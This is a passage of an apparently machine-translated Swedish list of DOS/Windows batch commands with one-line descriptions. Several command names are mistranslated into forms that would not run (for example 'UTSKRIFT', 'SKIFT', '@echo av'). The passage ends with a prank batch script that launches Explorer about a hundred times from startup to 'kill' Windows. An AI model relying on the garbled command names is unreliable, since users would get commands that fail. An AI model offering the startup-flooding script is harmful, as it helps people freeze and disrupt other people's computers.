PATH - Visar eller ställer in sökvägen för körbara filer.
PAUSE - Pausar bearbetningen av * .BAT -filen och visar ett meddelande.
POPD - Återställer det tidigare värdet för den aktuella katalogen som sparats av PUSHD.
UTSKRIFT - Skriver ut en textfil.
PROMPT - Ändrar kommandotolken i Windows.
PUSHD - Sparar den aktuella katalogen och ändrar sedan.
RD - Tar bort en katalog.
RECOVER - Återställer läsbar information från en dålig eller defekt disk.
REM - Skriver kommentarer (anteckningar) till * .BAT -filer eller CONFIG.SYS.
REN - Byt namn på filen eller filerna.
RENAME - Byt namn på filen eller filerna.
ERSTÄLL - Ersätter filer.
ÅTERSTÄLL - Återställer filer som arkiverades med kommandot BACKUP.
RMDIR - Tar bort en katalog.
SET - Visar, ställer in eller tar bort Windows -miljövariabler.
SETLOCAL - Börjar lokalisera miljöförändringar i en * .BAT -fil.
SETVER - Ställer in MS -DOS -versionsnumret som Windows berättar för programmet.
SKIFT - Ändrar positionen för de ersatta parametrarna i * .BAT -filen.
SMARTDRV - Installerar och konfigurerar SMART Drive Caching Utility.
SORT - Sorterar ingångsströmmen.
START - Startar ett separat fönster för att utföra det angivna programmet eller kommandot.
SUBST - Kopplar en sökväg till en enhetsbokstav.
SYS - Kopierar MS -DOS -systemfiler och kommandotolk till den enhet du anger.
TIME - Visar eller ställer in systemtiden.
TITLE - Ställer in titeln på fönstret för sessionen.
TREE - Grafiskt visar katalogstrukturen för enheten eller sökvägen.
TYPE - Visar innehållet i en textfil.
VER - Visar Windows -versionen.
VERIFY - Berättar för Windows om de ska kontrollera om filerna är skrivna korrekt till hårddisken.
VOL - Visar skivvolymetiketten och serienumret.
XCOPY - Kopierar filer och katalogträd.

Tja, om du vill "döda" Windows då:
@echo av
starta explorer
starta explorer
starta explorer
start explorer - upprepa 100 igen och skriv till start.